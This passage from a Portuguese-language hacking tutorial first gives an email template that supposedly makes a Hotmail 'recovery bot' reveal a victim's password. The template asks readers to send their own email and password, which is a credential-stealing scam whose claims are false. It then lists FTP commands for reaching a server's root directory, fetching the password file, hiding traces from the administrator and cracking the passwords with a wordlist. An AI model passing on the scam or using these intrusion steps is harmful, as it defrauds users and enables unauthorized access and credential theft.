* A SEGUNDA E TERCEIRA LINHA DEVEM SER ZEROS "0"

NOTA: Tem especial atenção em escrever tudo corretamente e na sua linha correspondente.



O corpo da mensagem será algo assim :


Para : mailreceiverpassaport@hotmail.com

Asunto: GOTO_PassRecovery_mail_MSN:000f-1a2a-r045


Rec_To-USR_RCVR:(e-mail da vitima)@hotmail.com/use_redir_gerza
0
0
REDIRECT_TO:(teu_email):(tua senha)


E pronto, você deverá em pouco tempo receber um e-mail com a indicação da password da sua "vitima". Caso não receba imediatamente, pode acontece de o bot estar sobrecarregado e seu e-mail acabe perdido do sistema. Quando isso ocorre, na segunda tentativa deverá receber. Há casos de usuários que receberam a senha imediatamente, outros após mais algumas tentativas. Se não conseguir de primeira, espere pelo menos 2 horas entre cada tentativa. Não tem erro. E assim consegue descobrir senha da pobre vítima! (veja foto abaixo)

Invasão por ftp

Vá ao prompt do DOS e digite ftp, depois Open e siga os seguintes passos:
1- Ftp.tba.com.br ou outro servidor de ftp que quiser. 2- O servidor vai perguntar o seu username, pressione enter 3- O servidor vai perguntar pela password, pressione enter 4- E no prompt escreva: quote user ftp e depois.. quote cwd ~root e depois.. quote pass ftp

O indivíduo faz isso para apagar o arquivo de "log", assim o administrador do sistema não saberá quem entrou e não o verá.
ATENÇÃO:
Se dizer na sua entrada "acess restriction apply" o indivíduo não estará a ter acesso ao ficheiro de senhas.
1-Digite cd\etc e digite get passwordSe o indivíduo tiver feito tudo isso correctamente e se o servidor tiver um simples e antigo sistema de segurança tudo correrá bem. Vai ter um "root access". Para quem não sabe, "root access" é o maior status de segurança que pode ter.
OBSERVAÇÕES:
Isso só irá funcionar em servidores antigos como os que as universidades usam. Todo caso se a pessoa não conseguir tem outra forma, entrando no user como anonymous e daí ele pedirá o e-mail dela, daí a pessoa provavelmente inserirá um inventado, tipo alguem@qualquer.com, daí é só entrar no diretório... etc e copiar a password. Na maioria das vezes as senhas estão encriptadas use o crackjack e uma word list para desincriptalas.